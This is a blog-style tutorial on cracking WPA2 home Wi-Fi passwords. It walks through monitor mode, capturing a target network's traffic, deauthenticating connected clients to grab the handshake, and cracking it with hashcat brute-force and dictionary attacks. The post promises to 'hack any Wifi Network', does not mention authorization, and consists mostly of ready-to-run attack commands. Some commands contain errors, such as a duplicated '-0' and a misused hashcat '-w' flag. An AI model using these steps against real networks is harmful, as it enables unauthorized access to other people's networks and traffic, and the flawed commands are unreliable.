Hello Folks,
I’m back again with my another blog, Today i’m going to show you how you can hack any Wifi Network from a noob to pro, I’m sharing some of my personal methods here that i’m following while doing this stuffs.
So, Here we are let’s talk about some basic stuffs first.
What is WIFI?
Wi-Fi is a wireless networking technology that allows devices such as computers (laptops and desktops), mobile devices (smart phones and wearables), and other equipment (printers and video cameras) to interface with the Internet.
What type of authentication it use?
The most widly use methods of authentication are Open authentication, WPA2-PSK (Pre-Shared Key) and WPA2-Enterprise.
- Open Authentication : As its name says an open authentication network allows user to access the resources and are not required to authenticate.
- WPA/WPA2/WPA3 : WPA Stands for WIFI Protected Access. This types of encryption uses different types of algorythm to encrypt the transport. mainly we are using WPA/WPA2, WPA3 is not yet published in all routers.
- WPA2-Enterprise : This methods also referred as WPA-802.1X mode, it authenticate wifi to different identity instead of single password, Mainly we see this types of authenticated routers in Airport, Railway Stations, Malls, Public Places etc.
It’s all about basic terminology let’s talk about how we can hack domestic level routers WIFI Password.
Tools we use
- Airmon-ng [To capture Handshake]
- Hashcat [To crack Password]
Let’s start working with the tools,
Firstly we’ve to plug the Wifi adapter in our device and look for the active wifi connections, Doesn’t matter you can use this tools in Linux, Windows and also in Android ( With Nethunter)
Let’s look for the available interface.
# iwconfig (To search for available interface)
In my case my system is connected to the external wifi adapter wlan1 and we can see that it is in Managed Mode.
Let’s start the monitor mode.
# airmon-ng start wlan1
Quickly verify.
Now we can see that our device is in monitor mode, So look forward to available networks.
# airodump-ng wlan1
Here is the available networks in my aread, Because of the security reason i can’t show the BSSID.
- BSSID : Refers to the Access Point MAC Address.
- STATIONS : Refers to the MAC Address of Connected Devices.
Here my Our target is the CanYouSeeMe
Note down the BSSID and CH no. of the Access Point.
Then we can search for the available clients for the single network. and store the captured data in the file called CanYouSeeMe
# airodump-ng --bssid <BSSID> -c 3 -w CanYouSeeMe wlan1
Here we can see that three clients is connected to the Access Point. And we are storing the data but we wan’t a Handshake.
So we proceed for the Deauth to capture the handshake once the client will reconnect then we’ll get the handshake.
# aireplay-ng -0 0 -a <BSSID> -c <STATION> wlan1
And once the client get reconnect we will get a Handshake.
And here we’ll get 5 files, we need .cap file to work on that.
Now time to crack password with hashcat, You can also use aircrack-ng but i recommend to use Hashcat because it uses GPU so it become more fast as compared to John and aircrack-ng.
To use cap file in hashcat we should use a tool to convert the file from .cap to .hccapx.
Clone this hashcat repo in you localdrive and use it.
Installation Steps :
# git clone https://github.com/hashcat/hashcat-utils
# cd /hashcat-utils/src
# makeAnd now all is ready we can use this tool directly
# ./cap2hccapx.bin /dev/shm/CanYouSeeMe-01.cap /dev/shm/CanYouSeeMe-01.hccapxIt directly convert the .cap file to .hccapx now we are ready to use this file in hashcat to crack password.
I’m using a bruteforce method to crack password you can also use Dictionary Attack to crack it.
Bruteforce Attack :
# hashcat -m 2500 -a 3 CanYouSeeMe-01.hccapx ?d?d?d?d?d?d?d?dDictionary Attack :
# hashcat -m 2500 -a 0 CanYouSeeMe-01.hccapx -w /usr/share/wordlist/rockyou.txt
For Dictionary attack you need a Strong Password Dictionary.
And here we see the password is cracked in less than a second.
It totally depend on the speed of your system how powerful system you are using.
All Comands :# iwconfig # airmon-ng start wlan1 (Start Interface to monitor Mode)
# airodump-ng wlan1 (Broadcast Nearby Wireless Routers)
# airodump-ng --bssid <BSSID> -c 7 -w Name wlan1
# aireplay-ng -0 -0 -a <BSSID> -c <STATION> wlan1
# ./cap2hccapx.bin /dev/shm/Airtel_home-01.cap /dev/shm/Airtel.hccapx [It convert .cap file to .hccapx]
# hashcat -m 2500 -a 3 CanYouSeeMe-01.hccapx ?d?d?d?d?d?d?d?d
# hashcat -m 2500 -a 0 CanYouSeeMe-01.hccapx -w /usr/share/wordlist/rockyou.txt
Here is the password.
Happy Hacking.
Follow me on twitter.
